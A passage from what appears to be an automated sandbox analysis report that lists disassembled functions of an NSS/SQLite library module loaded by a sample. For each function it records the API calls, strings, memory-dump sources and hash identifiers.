                                                                        • Instruction Fuzzy Hash: A6718F71D146869FDB00CF15CD40BAABBA8FF54348F154269E818D7B11F770E994CBA1
                                                                        Function 6CB5ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AE10
                                                                        • EnterCriticalSection.KERNEL32(?,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AE24
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,6CB3D079,00000000,00000001), ref: 6CB5AE5A
                                                                        • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AE6F
                                                                        • free.MOZGLUE(85145F8B,?,?,?,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AE7F
                                                                        • TlsGetValue.KERNEL32(?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AEB1
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AEC9
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AEF1
                                                                        • free.MOZGLUE(6CB3CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB3CDBB,?), ref: 6CB5AF0B
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AF30
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                        • String ID:
                                                                        • API String ID: 161582014-0
                                                                        • Opcode ID: bb7302d7389d2e6f5111521d3c10876016d0ab0f65121b16fd9af9c325c1b44d
                                                                        • Instruction ID: dce907c48412ea483cebacd395993f121800ccb1a359da667ebb81e17a8eacf3
                                                                        • Opcode Fuzzy Hash: bb7302d7389d2e6f5111521d3c10876016d0ab0f65121b16fd9af9c325c1b44d
                                                                        • Instruction Fuzzy Hash: DA5180B1A00642EFDB01DF25D884A69B7B4FF09319F544665D818A7E11E731E8B4CFE1
                                                                        Function 6CB34CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CB3AB7F,?,00000000,?), ref: 6CB34CB4
                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6CB3AB7F,?,00000000,?), ref: 6CB34CC8
                                                                        • TlsGetValue.KERNEL32(?,6CB3AB7F,?,00000000,?), ref: 6CB34CE0
                                                                        • EnterCriticalSection.KERNEL32(?,?,6CB3AB7F,?,00000000,?), ref: 6CB34CF4
                                                                        • PL_HashTableLookup.NSS3(?,?,?,6CB3AB7F,?,00000000,?), ref: 6CB34D03
                                                                        • PR_Unlock.NSS3(?,00000000,?), ref: 6CB34D10
                                                                          • Part of subcall function 6CBBDD70: TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                          • Part of subcall function 6CBBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
                                                                        • PR_Now.NSS3(?,00000000,?), ref: 6CB34D26
                                                                          • Part of subcall function 6CBD9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC20A27), ref: 6CBD9DC6
                                                                          • Part of subcall function 6CBD9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC20A27), ref: 6CBD9DD1
                                                                          • Part of subcall function 6CBD9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CBD9DED
                                                                        • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CB34D98
                                                                        • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CB34DDA
                                                                        • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CB34E02
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 4032354334-0
                                                                        • Opcode ID: 442a2fa50490267fc77b43384ef691504ca8eb90d976fdf9cbe5f67cfb2b4a70
                                                                        • Instruction ID: 4cd75d7b5d71163e6f3055c083ba803872a786c736e2871dda11d98e4c8243ab
                                                                        • Opcode Fuzzy Hash: 442a2fa50490267fc77b43384ef691504ca8eb90d976fdf9cbe5f67cfb2b4a70
                                                                        • Instruction Fuzzy Hash: 4341A8B5E001659BEB01AF79EC44A6A7BB8EF05219F054170EC1CC7B11EB36DD58CBA2
                                                                        Function 6CAFFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_initialize.NSS3 ref: 6CAFFD18
                                                                        • sqlite3_initialize.NSS3 ref: 6CAFFD5F
                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAFFD89
                                                                        • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CAFFD99
                                                                        • sqlite3_free.NSS3(00000000), ref: 6CAFFE3C
                                                                        • sqlite3_free.NSS3(?), ref: 6CAFFEE3
                                                                        • sqlite3_free.NSS3(?), ref: 6CAFFEEE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                        • String ID: simple
                                                                        • API String ID: 1130978851-3246079234
                                                                        • Opcode ID: 7a63af43dca0d51b24b99b7532a37ea07588acf4b40b322e22d982da27271b78
                                                                        • Instruction ID: c44e24b7bd7789950fec8abd4ffc119c14e71acbafa41dd1fa83e54300a9e302
                                                                        • Opcode Fuzzy Hash: 7a63af43dca0d51b24b99b7532a37ea07588acf4b40b322e22d982da27271b78
                                                                        • Instruction Fuzzy Hash: 4F9151B0A012059FDB04CF55CD80A6AF7F1FF85318F28855DE8299B756E735E886CB60
                                                                        Function 6CB05CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB05EC9
                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB05EED
                                                                        Strings
                                                                        • API call with %s database connection pointer, xrefs: 6CB05EC3
                                                                        • %s at line %d of [%.10s], xrefs: 6CB05EE0
                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB05ED1
                                                                        • misuse, xrefs: 6CB05EDB
                                                                        • unable to close due to unfinalized statements or unfinished backups, xrefs: 6CB05E64
                                                                        • invalid, xrefs: 6CB05EBE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: sqlite3_log
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                        • API String ID: 632333372-1982981357
                                                                        • Opcode ID: 41df168554bb6fd3261336bd2c7ffed8e6493f1e813eddac42a70cdc6a6d66eb
                                                                        • Instruction ID: 3e832f4d66dd17ebc20db9567dfe93113067681aca6180a6f9680d6b348c55bb
                                                                        • Opcode Fuzzy Hash: 41df168554bb6fd3261336bd2c7ffed8e6493f1e813eddac42a70cdc6a6d66eb
                                                                        • Instruction Fuzzy Hash: FB81D230B056A19BEB19CF25C848B6A7B70FF41308F18436AD8555BF51D734E84ACB9E
                                                                        Function 6CAEDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAEDDF9
                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEDE68
                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEDE97
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CAEDEB6
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAEDF78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                        • API String ID: 1526119172-598938438
                                                                        • Opcode ID: 62dbc50410cb6df448b1c99255039e0046bc96ddf1d83096a8efcd2da57a0c0b
                                                                        • Instruction ID: 3271e71ab023437350703cdf58e7fd45f71756170b98ad5009826a00a1e8717a
                                                                        • Opcode Fuzzy Hash: 62dbc50410cb6df448b1c99255039e0046bc96ddf1d83096a8efcd2da57a0c0b
                                                                        • Instruction Fuzzy Hash: 6A81B371B057019FD714DF25C880B6A77F1BF89308F14882DE99A8BA51E731E885DB92
                                                                        Function 6CB5CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CB5CD08
                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6CB5CE16
                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6CB5D079
                                                                          • Part of subcall function 6CBBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBBC2BF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: DoesErrorK11_MechanismValuememcpy
                                                                        • String ID:
                                                                        • API String ID: 1351604052-0
                                                                        • Opcode ID: 030196a6107062798fa9cf648b8744cda1c8c53315777ae779707397c6594caa
                                                                        • Instruction ID: c9b82a4ab3f3e9074c0c88c9efe9c4805ea1ab887bbe00067d26d4ac3e1d1097
                                                                        • Opcode Fuzzy Hash: 030196a6107062798fa9cf648b8744cda1c8c53315777ae779707397c6594caa
                                                                        • Instruction Fuzzy Hash: 0CC1AEB1A002599BDB10DF24DC80BDAB7B9FB48308F5441A8E848A7741E775EEA5CF91
                                                                        Function 6CB4DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CB597C1,?,00000000,00000000,?,?,?,00000000,?,6CB37F4A,00000000), ref: 6CB4DC68
                                                                          • Part of subcall function 6CB70BE0: malloc.MOZGLUE(6CB68D2D,?,00000000,?), ref: 6CB70BF8
                                                                          • Part of subcall function 6CB70BE0: TlsGetValue.KERNEL32(6CB68D2D,?,00000000,?), ref: 6CB70C15
                                                                        • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB4DD36
                                                                        • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB4DE2D
                                                                        • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB4DE43
                                                                        • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB4DE76
                                                                        • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB4DF32
                                                                        • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB4DF5F
                                                                        • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB4DF78
                                                                        • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB4DFAA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                        • String ID:
                                                                        • API String ID: 1886645929-0
                                                                        • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                        • Instruction ID: fe41f72cb7d6dae5a52161ce7d8a15c37b24ef0d7b0317799dc7de6f31210154
                                                                        • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                        • Instruction Fuzzy Hash: A881D570A8E5808BFF104A78F8A0B6972D2DB64748F20C43AD919CAFDDD775C484E613
                                                                        Function 6CB23C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CB23C76
                                                                        • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB23C94
                                                                          • Part of subcall function 6CB195B0: TlsGetValue.KERNEL32(00000000,?,6CB300D2,00000000), ref: 6CB195D2
                                                                          • Part of subcall function 6CB195B0: EnterCriticalSection.KERNEL32(?,?,?,6CB300D2,00000000), ref: 6CB195E7
                                                                          • Part of subcall function 6CB195B0: PR_Unlock.NSS3(?,?,?,?,6CB300D2,00000000), ref: 6CB19605
                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6CB23CB2
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CB23CCA
                                                                        • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CB23CE1
                                                                          • Part of subcall function 6CB23090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB3AE42), ref: 6CB230AA
                                                                          • Part of subcall function 6CB23090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB230C7
                                                                          • Part of subcall function 6CB23090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CB230E5
                                                                          • Part of subcall function 6CB23090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB23116
                                                                          • Part of subcall function 6CB23090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB2312B
                                                                          • Part of subcall function 6CB23090: PK11_DestroyObject.NSS3(?,?), ref: 6CB23154
                                                                          • Part of subcall function 6CB23090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB2317E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                        • String ID:
                                                                        • API String ID: 3167935723-0
                                                                        • Opcode ID: 66e9a130ada3550c34e96d6578ea928a1e9bf1726ad113457143787f70d9da5d
                                                                        • Instruction ID: 12d7ab3ebeca7c4e757e14ff18793006ee982a0da9579810e2622564e9e12855
                                                                        • Opcode Fuzzy Hash: 66e9a130ada3550c34e96d6578ea928a1e9bf1726ad113457143787f70d9da5d
                                                                        • Instruction Fuzzy Hash: 8C61A671A40240ABEB106E65DC41FBB76BDEF04748F484028FE1E9AA92F735D918C7B1
                                                                        Function 6CB12C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_ZAlloc_Util.NSS3(8069BA68), ref: 6CB12C5D
                                                                          • Part of subcall function 6CB70D30: calloc.MOZGLUE ref: 6CB70D50
                                                                          • Part of subcall function 6CB70D30: TlsGetValue.KERNEL32 ref: 6CB70D6D
                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CB12C8D
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB12CE0
                                                                          • Part of subcall function 6CB12E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB12CDA,?,00000000), ref: 6CB12E1E
                                                                          • Part of subcall function 6CB12E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB12E33
                                                                          • Part of subcall function 6CB12E00: TlsGetValue.KERNEL32 ref: 6CB12E4E
                                                                          • Part of subcall function 6CB12E00: EnterCriticalSection.KERNEL32(?), ref: 6CB12E5E
                                                                          • Part of subcall function 6CB12E00: PL_HashTableLookup.NSS3(?), ref: 6CB12E71
                                                                          • Part of subcall function 6CB12E00: PL_HashTableRemove.NSS3(?), ref: 6CB12E84
                                                                          • Part of subcall function 6CB12E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB12E96
                                                                          • Part of subcall function 6CB12E00: PR_Unlock.NSS3 ref: 6CB12EA9
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB12D23
                                                                        • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CB12D30
                                                                        • CERT_MakeCANickname.NSS3(00000001), ref: 6CB12D3F
                                                                        • free.MOZGLUE(00000000), ref: 6CB12D73
                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6CB12DB8
                                                                        • free.MOZGLUE ref: 6CB12DC8
                                                                          • Part of subcall function 6CB13E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB13EC2
                                                                          • Part of subcall function 6CB13E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB13ED6
                                                                          • Part of subcall function 6CB13E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB13EEE
                                                                          • Part of subcall function 6CB13E60: PR_CallOnce.NSS3(6CC72AA4,6CB712D0), ref: 6CB13F02
                                                                          • Part of subcall function 6CB13E60: PL_FreeArenaPool.NSS3 ref: 6CB13F14
                                                                          • Part of subcall function 6CB13E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB13F27
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                        • String ID:
                                                                        • API String ID: 3941837925-0
                                                                        • Opcode ID: 78fae82c45e5f8cedc980d268d0492a42098c3e53fb6236a457d88aa528fee53
                                                                        • Instruction ID: dfbadb7dcaec8362351b9a760bc3d61345fef436dd5e7c81326785e7a7a29014
                                                                        • Opcode Fuzzy Hash: 78fae82c45e5f8cedc980d268d0492a42098c3e53fb6236a457d88aa528fee53
                                                                        • Instruction Fuzzy Hash: 1F51E071A183A19BEB009E29DC85B6B77E5EF86348F14042CEC5983A50E731E8158B93
                                                                        Function 6CB17CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CB140D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CB13F7F,?,00000055,?,?,6CB11666,?,?), ref: 6CB140D9
                                                                          • Part of subcall function 6CB140D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CB11666,?,?), ref: 6CB140FC
                                                                          • Part of subcall function 6CB140D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CB11666,?,?), ref: 6CB14138
                                                                        • PR_GetCurrentThread.NSS3 ref: 6CB17CFD
                                                                          • Part of subcall function 6CBD9BF0: TlsGetValue.KERNEL32(?,?,?,6CC20A75), ref: 6CBD9C07
                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(?,6CC39030), ref: 6CB17D1B
                                                                          • Part of subcall function 6CB6FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CB11A3E,00000048,00000054), ref: 6CB6FD56
                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(?,6CC39048), ref: 6CB17D2F
                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CB17D50
                                                                        • PR_GetCurrentThread.NSS3 ref: 6CB17D61
                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6CB17D7D
                                                                        • free.MOZGLUE(?), ref: 6CB17D9C
